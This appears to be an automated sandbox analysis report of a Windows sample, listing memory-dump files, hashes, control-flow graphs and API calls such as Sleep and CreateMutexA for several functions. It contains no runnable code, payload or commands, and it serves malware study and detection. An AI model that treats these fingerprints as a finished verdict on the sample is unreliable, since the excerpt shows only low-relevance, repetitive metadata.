                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                                                                                                    • Opcode ID: b5dd72174dabbc2a17d0229e5849d1341d76c7f54a8fab58af70d7082005b4fc
                                                                                                                                                                                                                                                    • Instruction ID: 16b9d1c2f315ff4c4101c9af8d6838c61ddb22103fd97886cec5dbd9d49a493c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5dd72174dabbc2a17d0229e5849d1341d76c7f54a8fab58af70d7082005b4fc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5931FA31B04204ABFB1CDB78DD88B6DB762ABD6310F20C729E019973D5D77599818B52
                                                                                                                                                                                                                                                    Function 00A7A348 Relevance: 3.1, APIs: 2, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 325 a7a348-a7a368 329 a7a396-a7a3b2 325->329 330 a7a36a-a7a376 325->330 333 a7a3b4-a7a3c0 329->333 334 a7a3e0-a7a3ff 329->334 331 a7a38c-a7a393 call a8d593 330->331 332 a7a378-a7a386 330->332 331->329 332->331 337 a7a86f-a7a87e call aa6b9a * 3 332->337 339 a7a3d6-a7a3dd call a8d593 333->339 340 a7a3c2-a7a3d0 333->340 335 a7a401-a7a40d 334->335 336 a7a42d-a7a846 call a87f30 334->336 341 a7a423-a7a42a call a8d593 335->341 342 a7a40f-a7a41d 335->342 358 a7a883-a7a8c4 Sleep CreateMutexA 337->358 359 a7a87e call aa6b9a 337->359 339->334 340->337 340->339 341->336 342->337 342->341 361 a7a8d7-a7a8d8 358->361 362 a7a8c6-a7a8c8 358->362 359->358 362->361 363 a7a8ca-a7a8d5 362->363 363->361
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00A7A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00AD3224), ref: 00A7A8B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                                                                                                    • Opcode ID: 5c00f23edfcaa41cdc5f591ee1f380fae37fa8168b9b95d668d476a2a1e33e1a
                                                                                                                                                                                                                                                    • Instruction ID: bef3f38d2d77e2140053265e691e02a5413b10a2fa29415c947efa94f6c07cfb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c00f23edfcaa41cdc5f591ee1f380fae37fa8168b9b95d668d476a2a1e33e1a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9314E32B00204ABEB1CDB78DD8975DB7A1EFD6314F24C228E0199B3D5D77999818B63
                                                                                                                                                                                                                                                    Function 00A7A47D Relevance: 3.1, APIs: 2, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 365 a7a47d-a7a49d 369 a7a49f-a7a4ab 365->369 370 a7a4cb-a7a4e7 365->370 371 a7a4c1-a7a4c8 call a8d593 369->371 372 a7a4ad-a7a4bb 369->372 373 a7a515-a7a534 370->373 374 a7a4e9-a7a4f5 370->374 371->370 372->371 377 a7a874-a7a87e call aa6b9a * 2 372->377 375 a7a536-a7a542 373->375 376 a7a562-a7a846 call a87f30 373->376 379 a7a4f7-a7a505 374->379 380 a7a50b-a7a512 call a8d593 374->380 381 a7a544-a7a552 375->381 382 a7a558-a7a55f call a8d593 375->382 396 a7a883-a7a8c4 Sleep CreateMutexA 377->396 397 a7a87e call aa6b9a 377->397 379->377 379->380 380->373 381->377 381->382 382->376 399 a7a8d7-a7a8d8 396->399 400 a7a8c6-a7a8c8 396->400 397->396 400->399 401 a7a8ca-a7a8d5 400->401 401->399
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00A7A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00AD3224), ref: 00A7A8B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                                                                                                    • Opcode ID: ef61f5daf27cb13032293ee1bfdd2299ab66e3539819ca6ad82891c0be157e0a
                                                                                                                                                                                                                                                    • Instruction ID: 747f61bebadda608e6b967545018f586db0d663e643c9b6972dace23ffa676fd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef61f5daf27cb13032293ee1bfdd2299ab66e3539819ca6ad82891c0be157e0a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC316C31B00104ABEB1CDB78DD8876DB762EBD6314F24C229E019973D1D77A99818B23
                                                                                                                                                                                                                                                    Function 00A7A5B2 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 403 a7a5b2-a7a5d2 407 a7a5d4-a7a5e0 403->407 408 a7a600-a7a61c 403->408 409 a7a5f6-a7a5fd call a8d593 407->409 410 a7a5e2-a7a5f0 407->410 411 a7a61e-a7a62a 408->411 412 a7a64a-a7a669 408->412 409->408 410->409 415 a7a879-a7a87e call aa6b9a 410->415 417 a7a640-a7a647 call a8d593 411->417 418 a7a62c-a7a63a 411->418 413 a7a697-a7a846 call a87f30 412->413 414 a7a66b-a7a677 412->414 419 a7a68d-a7a694 call a8d593 414->419 420 a7a679-a7a687 414->420 430 a7a883-a7a8c4 Sleep CreateMutexA 415->430 431 a7a87e call aa6b9a 415->431 417->412 418->415 418->417 419->413 420->415 420->419 435 a7a8d7-a7a8d8 430->435 436 a7a8c6-a7a8c8 430->436 431->430 436->435 437 a7a8ca-a7a8d5 436->437 437->435
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00A7A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00AD3224), ref: 00A7A8B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
